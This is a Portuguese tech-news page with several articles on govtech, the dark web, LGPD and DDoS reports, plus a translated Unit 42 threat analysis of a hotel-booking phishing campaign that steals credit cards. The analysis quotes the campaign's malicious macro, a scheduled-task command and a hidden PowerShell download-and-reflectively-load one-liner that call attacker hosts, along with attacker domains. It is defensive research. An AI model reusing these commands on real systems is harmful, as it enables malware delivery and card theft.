Que é govtech e que vantagens oferece ao cidadão

web_lei.jpg*Por Jaison Niehues
26/03/2019 - Não é exagero dizer que o avanço da tecnologia ao longo dos últimos anos transformou o mundo e remodelou setores inteiros da economia. O mercado financeiro, por exemplo, deixou de ser centrado nos bancos e viu a consolidação das fintechs. O sistema educacional também mudou com o advento das edtechs e a área de saúde se prepara para o crescimento das healthtechs. Entre tantos acrônimos, um deles se destaca justamente por trazer eficiência e agilidade a um segmento conhecido pela burocracia e falta de transparência: o poder público. As govtechs já são uma realidade e oferecem diversas vantagens aos servidores e também aos cidadãos.

A pesquisa TIC Governo Eletrônico, conduzida por CGI.br (Comitê Gestor da Internet no Brasil) mostra que, aos poucos, as prefeituras brasileiras começam a adotar soluções de tecnologia da informação. Pouco mais da metade delas já possui algum recurso para a gestão de documentos (54%) e para o andamento dos processos (56%). Quase um terço do total (31%) já investe em um software de gestão integrada, otimizando o dia a dia dos servidores públicos e trazendo rapidez a todos os trâmites.

Da mesma forma que os outros exemplos já citados, a tecnologia voltada ao poder público deve ser pautada pela transformação digital que ocorre atualmente em todo o mundo. As soluções pensadas e desenvolvidas para este segmento devem priorizar a resolução de problemas reais dos cidadãos, como a burocracia nos processos internos e a demora na resposta de solicitações feitas. Além disso, é importante estimular o uso de equipamentos de fácil implementação e, principalmente, prezar pela transparência necessária a todos os órgãos federais, estaduais e municipais.

Quando se tem parceiros que auxiliam na implementação destas tecnologias, o poder público consegue atingir a tão desejada eficiência em seus trâmites. Afinal, se todos os documentos são digitalizados e ficam disponíveis às pessoas na web, se gabinetes e secretarias conseguem ter uma visão ampla de todo o processo, identificando em qual departamento está a solicitação e qual o profissional responsável, os gestores podem avaliar cada área de acordo com seu desempenho, apontando melhorias para aumentar a produtividade e melhorar os índices de satisfação da população.

Ainda hoje os órgãos públicos são vistos como sinônimos de burocracia e até de preguiça. Por muito tempo, solicitar um atendimento em governos municipais, estaduais ou até na União era uma via-sacra: a pessoa tinha que visitar diferentes departamentos e secretarias, acumular uma série de papéis e esperar todo o trâmite até ter sua solicitação atendida – um procedimento que costumava levar meses. Essa insatisfação aumentou com a evolução da tecnologia nas últimas décadas. Se tudo foi agilizado e ficou mais rápido, por que o poder público não pode ser ágil também?

Hoje não há mais espaço para prefeituras, secretarias e autarquias continuarem utilizando sistemas burocráticos e pouco efetivos no atendimento às demandas dos cidadãos. A tecnologia mostrou às pessoas que é possível desburocratizar, agilizar e ser mais transparente. Órgãos públicos que não se adaptarem a esta nova realidade terão sérias dificuldades no relacionamento com a população – e poderão até perder verbas por conta disso. O futuro já chegou ao governo e é totalmente tech.

*Jaison Niehues é fundador da 1Doc, plataforma web de comunicação, atendimento e gestão documental para órgãos públicos

Comentário (0) Hits: 1761

Diferenças entre Surface Web, Deep Web e Dark Web

deep_web2.jpg25/03/2019 - Nas últimas semanas falou-se muito sobre Surface Web e Deep Web, principalmente por causa das tragédias em Suzano e na Nova Zelândia. Além disso, os assassinos frequentavam fóruns na internet antes da tragédias acontecerem.

É na Dark Web que surgiu boa parte dos sites de venda de drogas, armas, pedofilia e fóruns radicais, mas vale ressaltar que a Dark Web também é frequentada por usuários que precisam de um refúgio para debates sem censura, em países autoritários que controlam a internet.

Para entender melhor como funciona a Surface Web, Deep Web e Dark Web, entrevistamos o especialista Leonardo Dias, que respondeu a algumas perguntas, que seguem abaixo:

Como surgiu a Deep Web?

A Deep Web surgiu da necessidade de uma busca pelo anonimato na internet. Na rede, todo mundo tem um IP e usa esse IP para navegar. Isso retira a possibilidade de anonimato. Redes como o "TOR" surgiram para possibilitar esse anonimato. Por meio de um sistema similar à uma rede privada virtual (VPN), usuários navegam com IPs de outros usuários que acessam a deep web, muitas vezes em outros países. Dessa forma, tudo o que é acessado é feito por outros IPs, possibilitando o anonimato.

O termo Deep Web se refere à parte das informações que estão na internet que não são indexadas pelos buscadores da rede, como o Google. São servidores que manuseiam dados que não aparecem em buscas, por mais detalhadas que sejam. A razão para isso não é necessariamente maliciosa na maioria dos casos. O Facebook é um bom exemplo, pois boa parte de seu conteúdo é protegido por senha, portanto não é acessível pelo buscador e não é indexado. O mesmo vale para mensagens, e-mails e arquivos na nuvem.

Principais diferenças entre Deep Web e Surface Web

Deep Web, por ter essa característica de anonimato, se tornou o ambiente para troca de informações sigilosas em geral. Surface Web é a web tradicional, com os sites principais, e-commerces e serviços online que conhecemos como por exemplo Google, Wikipedia e Bing.

Um usuário comum consegue acessar a Deep Web?

Quando foi criada era bem mais complicado. Hoje existem aplicações para smartphones que conseguem utilizar esses sistemas como se fossem navegadores, bem como utilizar o sistema como uma VPN.

Existe a possibilidade de se monitorar a Deep Web?

Existe, sim. E inclusive muita gente já foi presa por crimes na Deep Web. É possível também que empresas de cartão de crédito por exemplo, realizem um monitoramento em busca de cartões roubados expostos na deep web. É possível fazer isso por meio de um rastreamento dos principais fóruns da deep web, como Reddit, da internet tradicional.

O WikiLeaks navega na Dark Web?

Qualquer site pode ser acessado por meio de navegadores dessa rede "TOR". Existem buscadores como o Google e serviços de informação similar ao WikiLeaks. No fundo, é uma cópia mal feita da web tradicional.

Como funciona o monitoramento?

É possível monitorar grupos que defendem ideologias criminosas de ódio e extremistas, links de fóruns que divulgam cartões roubados, e gerar um sistema anti-fraude baseado nisso. Além disso, é possível monitorar as mensagens em fóruns conhecidos e acompanhar mensagens sobre atividades fraudulentas, levando ao monitoramento daquelas pessoas

Mesmo sendo uma rede que oferece um anonimato, você sempre acessa com um IP. Se esse IP está num país acionável juridicamente, é possível fazer o caminho de volta desse acesso, possibilitando encontrar criminosos dessa rede. Para realizar esse rastreamento, é necessário processar dum grande volume de dados para encontrar as informações necessárias junto a empresas de telecomunicações, por exemplo. Nem todo mundo possui recursos de análise para fazer esse caminho reverso, no entanto é possível encontrar IPs com comportamento específico por meio de padrões, utilizando ferramentas modernas de busca e de inteligência artificial e encontrar os caminhos. Pode ser necessário falar com provedores de outros países para encontrar a origem final do acesso. Não é impossível e, dependendo do caminho da rede que a pessoa se encontra, ela pode ser facilmente detectada.

Empresas do ramo financeiro também podem se beneficiar do monitoramento da Deep Web para encontrar dados roubados e antecipar-se a crimes que poderiam ser cometidos com esses dados. Para tanto é necessário contar com o apoio de empresas que fazem análise de dados utilizando machine learning e outras tecnologias.

Existe a possibilidade de se monitorar a Dark Web?

É possível também monitorar grupos crimonosos, os que defendem ideologias de ódio e extremistas e obter informações da mesma maneira que foi citada acima.

*Leonardo Dias é CDO e cofundador da Semantix, empresa especializada em Big Data, Inteligência Artificial, Internet das Coisas e Análise de dados.

Comentário (0) Hits: 2721

Como hackers executaram um negócio barato

cartao_shutterstock2.jpg15/03/2019 - *Esta é uma publicação do blog da Unit 42, unidade de pesquisa da Palo Alto Networks. Para análise completa, visite o link (em inglês):
Em dezembro de 2018, os pesquisadores da Unit 42 da Palo Alto Networks identificaram uma campanha em andamento com um forte foco no setor de hospitalidade, especificamente em reservas de hotéis. Embora nossa análise inicial não mostrasse nenhuma técnica nova ou avançada, observamos forte persistência durante a campanha que desencadeou nossa curiosidade.

Seguimos os rastros de rede e nos baseamos nas informações deixadas por esse indivíduo, como diretórios abertos, metadados de documentos e peculiaridades binárias, que nos permitiram encontrar um malware feito sob medida, que chamamos de "CapturaTela". Nossa descoberta desta família de malware mostra o motivo do foco persistente nas reservas de hotéis como um vetor principal: roubar informações de cartão de crédito dos clientes.

Analisamos estas ameaças e isso resultou na descoberta não apenas de seus mecanismos de entrega, mas também de seu arsenal de ferramentas de acesso remoto e trojans de roubo de informações, ambos adquiridos em fóruns clandestinos e em ferramentas de código aberto encontradas nos repositórios do GitHub.

Alguma vez você já se perguntou como uma pessoa pode administrar um negócio underground de dados de cartão de crédito muito barato e eficaz? Bem-vindo à "Operação Comando".

Mecanismos de entrega de malware do atacante

Nossa telemetria para essa campanha identificou o e-mail como o principal mecanismo de entrega de malware e descobriu que as primeiras amostras relacionadas foram distribuídas em agosto de 2018. Os tópicos usados pelo ator geralmente estão relacionados a reservas de viagem e vouchers e têm como alvo principalmente vítimas brasileiras. A Tabela 1 mostra uma lista representativa de assuntos típicos e nomes de anexos encontrados durante a campanha.


Tabela 1 Alguns assuntos de e-mail e nomes de anexos representativos desta campanha

Ao investigar os documentos maliciosos usados na campanha, descobrimos uma consistência interessante nos metadados do documento. O autor utiliza consistentemente um acrônimo durante todo o trabalho - "Original C.D.T" (veja detalhes na Figura 1).

Figura 1 Exemplo de metadados de documentos maliciosos

Os invasores fazem uso de vários métodos comuns, de prateleira, que são observados em muitas campanhas, como referências externas a scripts remotos executados pelo MSHTA (executável do Windows – malwares podem se disfarçar deste arquivo legitimo). Seguindo essa abordagem, esse ator pode encontrar várias ferramentas e recursos para executar suas atividades e, ao mesmo tempo, dificultar a atribuição e o rastreamento para os analistas.

Como exemplo de uma entrega de e-mail usada durante as campanhas de dezembro de 2018, vamos ver o que pretendia ser uma lista de alojamento (SHA256: ac70d15106cc368c571c3969c456778b494d62c5319dc366b7e2c116834c6187).

Os documentos maliciosos contêm uma macro simples, que executa um script hospedado remotamente usando MSHTA:

Public Sub Auto_Open()

var0 = "MSHTA http://bit[.]ly/2QXNTHi"

Var = var0

Shell (Var)

End Sub

O URL de destino: hxxps://internetexplorer200[.]blogspot[.]com/

As estatísticas do link encurtado por URL em bit.ly confirmam as observações de nossa telemetria, mostrando as metas principalmente no Brasil, conforme ilustrado na Figura 4.

Figura 4 Distribuição da campanha Bit.ly nos dias 27 e 28 de dezembro

O MSHTA executa conteúdos VBScript que são codificados / ofuscados usando um algoritmo muito simples (observe a presença de palavras em português em todo o código).

Código VBScript de primeiro estágio executado via MSHTA

Isso resulta na seguinte tarefa agendada criada no sistema, em que um novo script de segundo estágio é invocado via MSHTA a partir de outro local remoto. Observe que o código VB do segundo estágio contém uma referência a "CDT" em um comentário.

"set shhh = CreateObject(\"WScript.Shell\")\r\n Dim var1\r\n var1 = \"cmd.exe /c SchTasks /Create /sc MINUTE /MO 240 /TN AdobeUpdateSD /TR \"\".exe http://minhacasaminhavidacdt.blogspot[.]com/\"\r\nshhh.run var1, vbHide\r\n"

Script VB de segundo estágio

Esse código VBScript de segundo estágio acaba carregando uma carga útil final na memória por meio do reflexo do PowerShell, buscando o conteúdo binário de um arquivo com uma extensão GIF:

"CreateObject(\"Wscript.Shell\").run \"cmd.exe /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [Reflection.Assembly]::Load([Convert]::FromBase64String((New-Object Net.WebClient).DownloadString ('http://achoteis.com[.]br/images/64.gif'

))).EntryPoint.Invoke($null,$null)\"\r\n"

O payload final entregue neste caso é o RAME (Revenge Remote Access Trojan), uma ferramenta de commodity que pode ser usada para facilitar o roubo de informações.

Análise de Infraestrutura

No nível da infraestrutura, o invasor faz uso de serviços dinâmicos de DNS (DDNS), como DuckDNS, WinCo ou No-IP, muitos dos quais oferecem contas gratuitas diminuindo o investimento necessário para a infraestrutura do invasor. Alguns exemplos dos domínios em uso são detalhados na Tabela 2.

Dominios de DNS Dinâmicos

systenfailued.ddns[.]com[.]br

office365update[.]duckdns[.]org

cdtoriginal[.]ddns[.]net

Exemplos de domínios associados a essa campanha usando provedores de DDNS

Além de usar serviços gratuitos, colar sites e uso de sites comprometidos, também identificamos pelo menos um domínio que parece ser de propriedade de ator. O domínio "fejalconstrucoes [.] Com [.] Br" tem sido usado para hospedar cargas úteis, bem como enviar e-mails para vítimas em potencial. Figura 7 O registro DNS WHOIS mostra detalhes sobre o domínio, que foi registrado usando o serviço UOL no Brasil.

Figura 7 Registro do DNS WHOIS

Os e-mails com anexos maliciosos pertencentes a esta campanha foram encontrados com as seguintes características:

Domain: fejalconstrucoes[.]com[.]br

Email Senders: O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo., O endereço de e-mail address está sendo protegido de spambots. Você precisa ativar o JavaScript enabled para vê-lo.

Attachment names: Contrato Anual FEJAL Construçoes.ppa

Como mencionado anteriormente, um detalhe interessante em domínios e caminhos usados pelo invasor é o uso do acrônimo recorrente "CDT", como por exemplo:

hxxp://bit[.]ly/cdtqueda

hxxp://cdtoriginal.ddns[.]net

Identificando o driver principal do negócio: "CapturaTela"

Durante nossa investigação, um diretório aberto identificado nos permitiu encontrar várias cargas úteis usadas pelo invasor. Abaixo o conjunto de cargas e documentos encontrados. O acrônimo "CDT" continua aparecendo mesmo nos nomes de arquivos.

Conteúdo encontrado em um diretório aberto no cdtmaster [.] Com [.] Br

Apesar do nome do arquivo, "quasar.jse" não é QuasarRAT, mas sim um script JS que contém um dropper de payload codificado em base64, com uma carga útil muito simples e interessante para nossa investigação.

Dropper de payload de base64 JS

A carga decodificada é um arquivo PE, escrito em .NET, com recursos de roubo de informações. Um de seus principais métodos dá nome à nossa família de malware "CapturaTela" e, como seu nome em português indica, tem a capacidade de salvar uma captura de tela em um objeto Bitmap.

CapturaTela method's screen capture capabilities.

A principal funcionalidade deste trojan de roubo de informações é a seguinte

- Iterar sobre a lista de processos abertos e verificar títulos de janela específicos. O título deve conter "ls. B" ou "o. B" para a amostra realizar outra atividade.

- Se o título for encontrado, uma captura de tela será tirada e enviada por e-mail como um anexo JPEG.

- Ele eliminará os processos existentes do Chrome quando concluído. Os títulos das janelas provavelmente se baseiam no conteúdo das tags do Chrome.

Recursos de exfiltração de e-mail do CapturaTela

Para validar a funcionalidade, decidimos criar uma página da Web simples que correspondesse ao conteúdo do título e corrigimos a amostra mal-intencionada para usar uma conta de e-mail de teste sob nosso controle.

Testar página HTML e depurar a funcionalidade do CapturaTela. Como resultado, confirmamos o formato e o conteúdo das informações exfiltradas que o atacante planejava coletar de suas vítimas.

E-mail recebido com dados exfiltrados

Então, a única questão que restava para nossa investigação era o tipo de conteúdo e títulos de janela que esse trojan de roubo de informações estava procurando? Quais tipos de páginas da Web podem conter "ls · B" ou "o · B" como parte de seu título?

Inicialmente, encontrar um site com essas propriedades parecia ser uma tarefa impossível, mas começamos a pesquisa com base no que sabíamos sobre os metadados de segmentação e envio de e-mails usados nessas campanhas. Com esses dados, pudemos identificar possíveis websites de destino contendo determinados termos, mas comuns ao setor e à natureza da empresa, nos títulos das páginas dos sites, em inglês e português, que correspondessem à correspondência de padrões de string descrita acima e invoque os recursos de roubo de cartões de crédito do malware. Os websites encontrados nos levam ao fato de que o foco do invasor é obter os detalhes completos do cartão de crédito da vítima durante um determinado processo de compra.

Depois de analisar várias amostras do CapturaTela e extrair o conteúdo da parte de configuração do e-mail, várias sequências interessantes foram encontradas.

Interesting strings

Comando30

Comando30@cdt

comando50

Strings interessantes em configurações de email

O uso contínuo do acrônimo "CDT" e a presença da palavra "Comando", que poderíamos associar à primeira letra, nos levaram a escolher a "Operação Comando" para descrever essa campanha.

Uso extensivo de Trojans de Acesso Remoto

Além do uso do trojan personalizado CapturaTela, o ator faz uso extensivo de vários outros trojans de acesso remoto para executar suas atividades maliciosas. As seguintes famílias do RAT foram observadas durante a campanha do ator.

- RAT Family

- LimeRAT

- RevengeRAT

- NjRAT

- AsyncRAT

- NanoCoreRAT

- RemcosRAT

Tabela 5 Principais famílias de RAT observadas nesta campanha

O uso extensivo dessas ferramentas de RAT potencialmente aumenta os objetivos de negócios, dada a quantidade de informações que o ator pode obter sobre os resultados de compra de cartão de crédito roubados dos sites-alvo por meio de vítimas infectadas.

Existem vários exemplos de famílias RAT usadas que podem ser encontradas no GitHub, como:

http://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

http://github.com/NYAN-x-CAT/Lime-RAT

Sobrepõe-se a outras pesquisas publicadas

Alguns dos domínios e amostras encontrados nesta investigação já foram pesquisados e relatados por Yoroi. Com base nos detalhes de nossa pesquisa, acreditamos que, apesar de algumas pequenas sobreposições nas técnicas utilizadas, essa campanha não está relacionada ao Gorgon Group.

Conclusões

A Operação Comando é uma campanha de cibercrime puro, possivelmente de origem brasileira, com um foco concreto e persistente no setor hoteleiro, que comprova como um agente de ameaça pode ser bem-sucedido na busca de seus objetivos, mantendo um orçamento baixo. O uso de serviços DDNS, ferramentas de acesso remoto disponíveis publicamente e ter um conhecimento mínimo sobre desenvolvimento de software (neste caso, VB.NET) foi suficiente para executar uma campanha com duração de um mês e coletar potencialmente informações de cartão de crédito e outros dados.

Enquanto campanhas de cibercrime como essa permanecem ativas, os clientes da Palo Alto Networks estão protegidos contra essas ameaças das seguintes maneiras:

- WildFire detecta todos os documentos maliciosos e payloads entregues como malware.
- Clientes do AutoFocus podem acompanhar esta campanha usando a seguinte tag
- TRAPS bloqueia todos os arquivos associados a essa campanha.

A Palo Alto Networks compartilhou nossas descobertas, incluindo amostras de arquivos e indicadores de comprometimento, neste relatório com nossos colegas membros da Cyber Threat Alliance. Os membros da CTA usam essa inteligência para implantar rapidamente proteções para seus clientes e para interromper sistematicamente os cibercriminosos. Para mais informações sobre a Cyber Threat Alliance, visite cyberthreatalliance.org

Crédito: Imagem cartões / Shutterstock

Comentário (0) Hits: 3400

Os desafios da nova Lei Geral de Proteção de Dados

censura_na_internet.jpg*Por Sergio Maia
12/03/2019 - A Lei Geral de Proteção de Dados (LGPD) altera significativamente as obrigações das empresas quanto ao manuseio e tratamento de informações pessoais de seus colaboradores, funcionários de empresas terceirizadas, clientes e fornecedores. E tem a finalidade de aumentar a proteção à privacidade dos indivíduos e o controle sobre seus próprios dados.

Hoje as empresas utilizam big data e analytics para extrair dados de clientes e assim oferecer produtos e serviços de forma mais assertiva, de acordo com gostos e preferências dos consumidores. Um dos principais dispositivos da lei referente a esse ponto é a obrigatoriedade da obtenção do consentimento expresso do titular do dado pessoal nas situações em que ocorrer seu tratamento, como no caso citado. A forma de obtenção desse consentimento pode variar, mas a anuência deve ocorrer.

Caberá à Autoridade Nacional de Proteção de Dados (ANPD) a responsabilidade de acompanhar e fiscalizar se as empresas estão cumprindo com a nova lei. Neste sentido, uma das ferramentas à disposição da Autoridade é um dispositivo que prevê a apresentação de um "Relatório de Impacto à Proteção de Dados Pessoais", que poderá ser solicitado a qualquer momento pela ANPD e deverá conter, minimamente, a descrição dos processos de tratamento de informações pessoais, bem como medidas, salvaguardas e mecanismos de mitigação de risco. Essa é mais uma forma da ANPD ter visibilidade de como as empresas utilizam dados pessoais para fins de "big data e analytics".

Assim, a nova lei impactará diretamente todos os setores produtivos da economia, que de alguma forma, faz uso ou mesmo simplesmente coleta dados pessoais, , afetando-os em menor ou maior grau. Empresas de serviços ao consumidor possivelmente terão mais trabalho na adequação à lei, por conta do alto nível de interação com estes e com a vasta cadeia de valor associada à prestação desses serviços. Mas como as empresas podem se adaptar à nova lei? O primeiro passo é sem dúvida um mapeamento criterioso das atividades de cada departamento interno da empresa no tocante à coleta e ao tratamento de dados pessoais. A partir daí a empresa terá uma lista de ações específicas para cada departamento de forma a atender aos requisitos da lei. Depois do mapeamento vem a implementação propriamente dita, que também traz suas complexidades e vai depender das características de cada departamento.

Em uma visão macro a promulgação da lei põe o Brasil no rol de mais de 100 países que poderiam ser considerados adequados para proteger a privacidade e o uso de dados. Essa é uma sinalização positiva e mostra a preocupação do governo em lidar de forma responsável na prevenção de eventos de vazamento de dados em massa noticiados na mídia internacional.

A LGPD terá entre seus principais desafios a missão de conscientizar a sociedade de que "dado pessoal" é um bem de valor que deve ser protegido, sob pena de trazer prejuízos ao indivíduo se for utilizado indevidamente e para fins diferentes do que foi consentido pelo titular, ou seja uma mudança de "mind set".

Outro ponto é o tempo de adequação das empresas à lei, em princípio fixado para fevereiro/2020, o que é um prazo bem curto, considerando todos os ajustes que as empresas terão de fazer em seus sistemas internos e procedimentos.

A lei oferece múltiplos benefícios, e entre os beneficiários está o titular do dado pessoal, que é ponto focal da Lei. A LGPD traz especial relevância no que se refere à transparência para o uso de dados pessoais, à compatibilização do uso destes com as finalidades informadas e a respectiva responsabilização do agente que os coleta. De forma resumida, significa limitar o uso das informações ao mínimo necessário para que se possa atingir a finalidade pretendida, além de garantir a eliminação dos dados depois de atingida tal finalidade.

Caso a empresa descumpra a lei, ela sofrerá penalidades que incluem: (i) advertência, (ii) publicitação da infração e (iii) multa que pode chegar até 2% do faturamento bruto da empresa, limitada no total de R$ 50 milhões, por infração.

*Sergio Maia é gerente de assuntos regulatórios da Hughes

Comentário (0) Hits: 1486

Netscout apresenta o início da era TerrorBit

netscout.jpg06/03/2019 - Relatório da Inteligência de Ameaças da Netscout revela novas descobertas sobre vulnerabilidades na IoT, terrorismo de estado e maior frequência e tamanho dos ataques DDoS

A Netscout, fornecedora de service assurance, segurança e business analytics, divulga seu mais recente Relatório de Panorama de Ameaças, com informações sobre ameaças na Internet em escala global analisadas por seu time dedicado a pesquisas de segurança. Examinando as descobertas do segundo semestre de 2018, o relatório abrange as últimas tendências e atividades, incluindo grupos voltados para ameaças persistentes avançadas (APT), vulnerabilidades de IoT, operações de crimeware e campanhas de ataque de negação de serviço (DDoS).

“Nossas descobertas mostram, no segundo semestre de 2018, um cenário em que os ataques parecem estar tomando anabolizantes, compara Hardik Modi, diretor sênior de Inteligência de ameaças da Netscout, que explica: “aumentam o tamanho e a frequência do ataque DDoS, o terrorismo de estado e a velocidade das ameaças IoT. Dessa forma, não podemos mais ignorar as frequentes ameaças de pessoas mal-intencionadas explorando a interdependência do mundo conectado”.

Destaques:

Baseando-se na visibilidade que seu sistema ATLAS (Active Level Threat Analysis System) tem da Internet e nas análises de seu time ASERT (ATLAS Security Engineering and Response Team), o Relatório de Inteligência Netscout proporciona uma visão exclusiva do cenário de ameaças, revelando as descobertas ocorridas no segundo semestre de 2018.

O Relatório de Inteligência Netscout mostra que, nos últimos seis meses de 2018, os atacantes aprimoraram táticas já existentes, melhorando seu desempenho, e aplicaram técnicas inteligentes de modo a aumentar ainda mais os ataques. As principais conclusões do relatório incluem:

Contagem regressiva para ataques IoT

Alvos constantes de malware DDoS, os dispositivos IoT são atacados cinco minutos depois de conectados, constituindo alvo de explorações específicas dentro de 24 horas.
A segurança dos dispositivos IoT é mínima, e muitas vezes inexistente. Assim, essa é uma área especialmente perigosa e vulnerável, englobando itens que variam de dispositivos médicos a equipamentos para automóveis.

TerrorBit e mais além

O número de ataques DDoS em 2018 aumentou 26% em comparação ao ano anterior, e explodiu o número de ataques na faixa de 100 a 400 Gbps, o que demonstra o interesse despertado por esse vetor de ataque, e, ainda, a maturidade das ferramentas para ataques nesta faixa.

O tamanho máximo de ataques DDoS, em todo o mundo, cresceu 19% no segundo semestre de 2018 em comparação com o mesmo período do ano anterior, quando foram lançadas campanhas estratégicas que comprometiam e usavam uma vasta gama de dispositivos dedicados à conectividade com a Internet. E o “carpet bombing” – uma variante dos ataques mais comuns de inundação ou reflexão – surgiu, exigindo diferentes técnicas de detecção.

Inovação em ataques no campo dos estados-nação

Os ataques DDoS contra instituições relacionadas à política internacional, como a própria ONU, o Fundo Monetário Internacional e o Departamento de Estado do governo norte-americano, aumentaram quase 200% entre o segundo semestre de 2017 e o segundo semestre de 2018.

O volume de ameaças persistentes avançadas (APT) utilizadas por grupos ligados a estados-nação aumentou no espaço de um ano, assim como o número de alvos. A Netscout hoje monitora as atividades de pelo menos 35 grupos em vários países, incluindo Irã, China, Rússia e Coreia do Norte.

Esses grupos estão empregando novas técnicas, que combinam ferramentas criadas sob medida com commodities do crimeware, como no caso do STOLEN PENCIL, para ampliar seu alcance e impacto.

Comercialização do crineware

O submundo do crime cibernético opera de maneira semelhante ao dos negócios legítimos, usando a prática comercial convencional do modelo de afiliação para gerar lucros rapidamente. O aumento no tamanho dos ataques reflete a monetização que vem ocorrendo no cenário de ameaças.

Campanhas como a DanaBot aumentaram a eficiência da distribuição e reduziram os custos de mão de obra usando um modelo de afiliação para estabelecer rapidamente sua presença em todo o mundo, com 12 afiliadas que visam instituições financeiras em muitos países.

No entanto, o combate ao crime colaborativo também está em ascensão, como ilustram os esforços recentes da equipe ASERT e do FBI durante investigação sobre a MedusaHTTP, botnet para ataques DDoS de um hacker conhecido como stevenkings, que levou a uma acusação formal junto à justiça.

Por meio de telemetria em grande escala, o ATLAS oferece visibilidade de redes backbone no núcleo da Internet. A Netscout reúne dados compartilhados por organizações, incluindo 90% das mais importantes operadoras em todo o mundo, representando aproximadamente um terço do tráfego da Internet. A Netscout correlaciona este e outros conjuntos de dados para fornecer compartilhamento de dados automatizado e inteligência, facilitando seu uso por todos os usuários da Internet, corporativos e individuais, e oferecendo-lhes condições de compreender melhor as ameaças a que estão expostos e reagir a elas.

Comentário (0) Hits: 1563

Pesquisa analisa e mapeia ataques massivos de DDoS

cloud_ddos.jpg07/02/2019 – Servidores cloud hospedam quase meio milhão de armas para ataques DDoS. Dispositivos e aplicações podem ser usados em ataques massivos

A10 Networks, fornecedora de soluções de segurança cibernética inteligentes e automatizadas, divulga os dados de sua pesquisa sobre segurança intitulada “The State of DDoS Weapons” (O estado das armas DDoS). Os resultados do estudo mostraram as  análises e mapeamento das vulnerabilidades no mundo no último trimestre do ano passado e registrou 22,811,159 armas de DDoS.

Os ataques DDoS estão crescendo em frequência, intensidade e sofisticação. E, embora eles sejam distribuídos globalmente, a pesquisa descobriu dados interessantes sobre a suas origens e fontes. As maiores concentrações de ataques ocorrem em países com grande densidade populacional. A China ocupa o primeiro lugar do ranking, com 4,347,660 ataques, seguida pelos Estados Unidos da América (3,010,039), Itália (900,584), Rússia (864,414), Coréia do Sul (729,842), Alemanha (507,162) e Índia (506,373).  

O estudo também identificou 467,040 armas de DDoS hospedadas em servidores cloud. Com a adoção desta tecnologia em larga escala e com o impacto da mobilidade na entrega de aplicações, as armas também estão evoluindo com o resto da indústria.

Desde o advento da internet, foi preciso pouco mais de 25 anos para conectar 55% da população mundial, numa taxa de 4,6 pessoas por segundo. Número baixo se comparado com a quantidade de dispositivos conectados por segundo: 127. E isso está aumentando a medida que novas tecnologias surgem, como a Internet das Coisas (IoT), e a nova era de conexão 5G.

“O 5G vai expandir drasticamente os ataques nas redes, uma vez que esta tecnologia permite mais velocidade e latência ultrabaixa, possibilitando assim uma infinidade de novos casos de uso de IoT e crescimento exponencial de dispositivos conectados. Por outro lado, o 5G, juntamente com a inteligência artificial, serão essenciais na detecção e mitigação de ameaças”, afirma Ivan Marzariolli, country manager da A10 Networks.

Os maiores ataques DDoS são os de reflexão/amplificação. Essa técnica explora falhas nos protocolos DNS, NTP, SNMP, SSDP e outros protocolos para maximizar a escala dos ataques. E, de novo, China e Estados Unidos reúnem os maiores números de ataques. Nos ataques a protocolos de DNS, os EUA ocupam o primeiro lugar, com 1,401,407, seguidos pela China, com 885,625. Eles também ocupam o primeiro lugar nos ataques NTP (EUA – 1,302,440 e China – 1,202,017) e CLDPA (EUA - 1,233,398 e China 265,816).

Por meio das pesquisas, a A10 Networks registra e enumera os ataques DDoS para prevenir e bloquear ataques de maneira eficiente. “É impossível entender completamente a motivação ou o timing dos ataques DDoS. No entanto, é possível ter um inventário das armas e redes comprometidas. A A10 Networks Threat Intelligence fornece dados de defesa primordiais que ajudam a entender melhor a situação dos DDoS permitindo assim uma defesa proativa, que age antes dos ataques acontecem.”, explica Rich Groves, diretor de pesquisa de segurança da A10 Networks.

 

Comentário (0) Hits: 1727

newsletter buton